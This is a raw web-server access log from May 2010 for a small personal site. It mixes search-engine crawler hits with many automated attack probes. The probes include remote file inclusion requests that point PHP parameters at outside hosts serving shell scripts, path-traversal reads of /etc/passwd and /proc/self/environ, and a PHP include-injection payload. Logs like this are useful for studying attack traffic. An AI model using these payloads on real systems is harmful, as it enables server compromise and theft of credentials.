207.46.13.51 - - [15/May/2010:00:34:40 -0500] "GET /logs/access_log.1200960000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [15/May/2010:00:34:42 -0500] "GET /logs/access_log.1264204800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.190.102.21 - - [15/May/2010:00:35:26 -0500] "GET //album_portal.php?phpbb_root_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
121.190.102.21 - - [15/May/2010:00:35:26 -0500] "GET /logs//album_portal.php?phpbb_root_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
121.190.102.21 - - [15/May/2010:00:35:27 -0500] "GET /logs/access_log.1263081600//album_portal.php?phpbb_root_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.233.3.101 - - [15/May/2010:00:36:50 -0500] "GET /logs///phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.233.3.101 - - [15/May/2010:00:36:50 -0500] "GET /logs/access_log.1263168000///phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.233.3.101 - - [15/May/2010:00:36:50 -0500] "GET ///phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.232.85.247 - - [15/May/2010:00:37:44 -0500] "GET /logs/access_log.1273363200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
211.232.85.247 - - [15/May/2010:00:37:45 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
211.232.85.247 - - [15/May/2010:00:37:46 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:00:40:36 -0500] "GET /logs/access_log.1225238400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [15/May/2010:00:51:31 -0500] "GET /logs/access_log.1179964800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.185 - - [15/May/2010:00:58:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [15/May/2010:01:03:45 -0500] "GET /logs/access_log.1244419200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.252.3.123 - - [15/May/2010:01:03:46 -0500] "GET /logs/index.php?langc=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
87.252.3.123 - - [15/May/2010:01:03:46 -0500] "GET /index.php?langc=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
211.232.85.247 - - [15/May/2010:01:03:59 -0500] "GET /logs/access_log.1232668800/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
183.96.214.171 - - [15/May/2010:01:07:48 -0500] "GET /write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
183.96.214.171 - - [15/May/2010:01:07:48 -0500] "GET /logs/access_log.1266537600/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
183.96.214.171 - - [15/May/2010:01:07:48 -0500] "GET /logs/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.195.112.180 - - [15/May/2010:01:11:49 -0500] "GET /artwork/paintings.htm HTTP/1.0" 200 2300 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.138 - - [15/May/2010:01:11:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.138 - - [15/May/2010:01:11:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [15/May/2010:01:14:48 -0500] "GET /logs/access_log.1217721600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.43 - - [15/May/2010:01:16:52 -0500] "GET /?M=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
94.27.96.213 - - [15/May/2010:01:18:59 -0500] "GET /logs/access_log.1228176000 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1228176000""Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
94.27.96.213 - - [15/May/2010:01:18:59 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
124.0.74.195 - - [15/May/2010:01:19:25 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
124.0.74.195 - - [15/May/2010:01:19:25 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
124.0.74.195 - - [15/May/2010:01:19:26 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 200 5643 "-""libwww-perl/5.805"
208.112.114.164 - - [15/May/2010:01:22:58 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=' HTTP/1.1" 404 317 "-""libwww-perl/5.831"
208.112.114.164 - - [15/May/2010:01:22:58 -0500] "GET //inc/header.php/step_one.php?server_inc=' HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.127.70.140 - - [15/May/2010:01:23:38 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.127.70.140 - - [15/May/2010:01:23:38 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 359 "-""Mozilla/5.0"
216.127.70.140 - - [15/May/2010:01:23:38 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.127.70.140 - - [15/May/2010:01:24:03 -0500] "GET /logs/access_log.1268956800%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 359 "-""Mozilla/5.0"
207.46.13.85 - - [15/May/2010:01:26:12 -0500] "GET /logs/access_log.1180742400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.112.114.164 - - [15/May/2010:01:26:57 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=' HTTP/1.1" 404 317 "-""libwww-perl/5.831"
208.112.114.164 - - [15/May/2010:01:26:57 -0500] "GET //inc/header.php/step_one.php?server_inc=' HTTP/1.1" 404 312 "-""libwww-perl/5.831"
67.195.112.180 - - [15/May/2010:01:28:27 -0500] "GET /logs/access_log.1217635200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [15/May/2010:01:28:32 -0500] "GET /logs/access_log.1238630400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [15/May/2010:01:28:34 -0500] "GET /logs/access_log.1232582400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.227 - - [15/May/2010:01:28:39 -0500] "GET /logs/access_log.1184716800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.196 - - [15/May/2010:01:29:39 -0500] "GET /logs/access_log.1192060800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [15/May/2010:01:31:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
183.96.214.171 - - [15/May/2010:01:32:11 -0500] "GET /write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
183.96.214.171 - - [15/May/2010:01:32:11 -0500] "GET /logs/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
183.96.214.171 - - [15/May/2010:01:32:11 -0500] "GET /logs/access_log.1238803200%20%20/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
183.96.214.171 - - [15/May/2010:01:32:18 -0500] "GET /logs/access_log.1238803200/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
183.96.214.171 - - [15/May/2010:01:32:18 -0500] "GET /write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
183.96.214.171 - - [15/May/2010:01:32:18 -0500] "GET /logs/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.192.97.194 - - [15/May/2010:01:34:18 -0500] "GET //inc/header.php/step_one.php?server_inc=http://cwbba.co.kr//bbs/icon/sc1?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.192.97.194 - - [15/May/2010:01:34:18 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://cwbba.co.kr//bbs/icon/sc1?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
67.192.97.194 - - [15/May/2010:01:34:18 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://cwbba.co.kr//bbs/icon/sc1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.192.97.194 - - [15/May/2010:01:34:18 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://cwbba.co.kr//bbs/icon/sc1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
75.125.245.42 - - [15/May/2010:01:34:20 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.globeessolutions.com/components/com_linx/j1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
75.125.245.42 - - [15/May/2010:01:34:20 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.globeessolutions.com/components/com_linx/j1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
75.125.245.42 - - [15/May/2010:01:34:20 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.globeessolutions.com/components/com_linx/j1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
75.125.245.42 - - [15/May/2010:01:34:20 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.globeessolutions.com/components/com_linx/j1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.119.152.183 - - [15/May/2010:01:36:41 -0500] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-""libwww-perl/5.803"
207.46.199.190 - - [15/May/2010:01:40:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.235 - - [15/May/2010:01:43:09 -0500] "GET /logs/access_log.1261958400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [15/May/2010:01:47:49 -0500] "GET /logs/access_log.1255478400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.0.74.195 - - [15/May/2010:01:48:52 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
124.0.74.195 - - [15/May/2010:01:48:53 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
124.0.74.195 - - [15/May/2010:01:48:53 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
124.0.74.195 - - [15/May/2010:01:49:59 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
124.0.74.195 - - [15/May/2010:01:57:09 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
85.119.152.183 - - [15/May/2010:02:03:00 -0500] "GET /logs/access_log.1272844800/components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 337 "-""libwww-perl/5.803"
85.119.152.183 - - [15/May/2010:02:03:00 -0500] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-""libwww-perl/5.803"
85.119.152.183 - - [15/May/2010:02:03:00 -0500] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-""libwww-perl/5.803"
124.0.74.195 - - [15/May/2010:02:07:03 -0500] "GET /logs/access_log.1264636800//bbs//skin/f2plus_gallery_2_0/view.php?dir=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
124.0.74.195 - - [15/May/2010:02:07:03 -0500] "GET //bbs//skin/f2plus_gallery_2_0/view.php?dir=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
124.0.74.195 - - [15/May/2010:02:07:03 -0500] "GET /logs//bbs//skin/f2plus_gallery_2_0/view.php?dir=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
208.115.111.248 - - [15/May/2010:02:09:16 -0500] "GET /logs/access_log.1217635200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.199.162 - - [15/May/2010:02:09:40 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.162 - - [15/May/2010:02:09:41 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [15/May/2010:02:12:35 -0500] "GET /logs/access_log.1258502400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.119.152.183 - - [15/May/2010:02:16:25 -0500] "GET /logs/impex/ImpExData.php?systempath=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 308 "-""libwww-perl/5.803"
85.119.152.183 - - [15/May/2010:02:16:25 -0500] "GET /impex/ImpExData.php?systempath=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
38.101.148.126 - - [15/May/2010:02:18:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:02:18:32 -0500] "GET /logs/access_log.1252108800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
61.67.201.187 - - [15/May/2010:02:20:21 -0500] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 437 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:21 -0500] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 442 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:21 -0500] "GET /logs/access_log.1273363200%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:22 -0500] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 442 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:22 -0500] "GET /logs/access_log.1273363200%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:23 -0500] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 437 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:24 -0500] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 442 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:25 -0500] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 437 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:25 -0500] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 437 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:26 -0500] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 442 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:26 -0500] "GET /logs/access_log.1273363200%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:26 -0500] "GET /logs/access_log.1273363200%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:35 -0500] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 437 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:35 -0500] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 442 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:36 -0500] "GET /logs/access_log.1273363200%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:39 -0500] "GET /logs/access_log.1273363200%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:39 -0500] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 442 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:20:39 -0500] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 437 "-""Mozilla/5.0"
85.119.152.183 - - [15/May/2010:02:22:36 -0500] "GET /logs//zipndownload.php?PP_PATH=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.803"
85.119.152.183 - - [15/May/2010:02:22:37 -0500] "GET //zipndownload.php?PP_PATH=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""libwww-perl/5.803"
61.67.201.187 - - [15/May/2010:02:23:50 -0500] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 437 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:23:50 -0500] "GET /logs/access_log.1273363200%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:23:50 -0500] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 442 "-""Mozilla/5.0"
38.101.148.126 - - [15/May/2010:02:26:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:02:26:35 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
61.67.201.187 - - [15/May/2010:02:28:12 -0500] "GET /logs/access_log.1273276800%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:28:38 -0500] "GET /logs/access_log.1273276800%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
74.50.85.15 - - [15/May/2010:02:31:16 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
74.50.85.15 - - [15/May/2010:02:31:16 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
74.50.85.15 - - [15/May/2010:02:31:16 -0500] "GET /logs/access_log.1273363200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
74.50.85.15 - - [15/May/2010:02:31:16 -0500] "GET /logs/access_log.1273190400//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
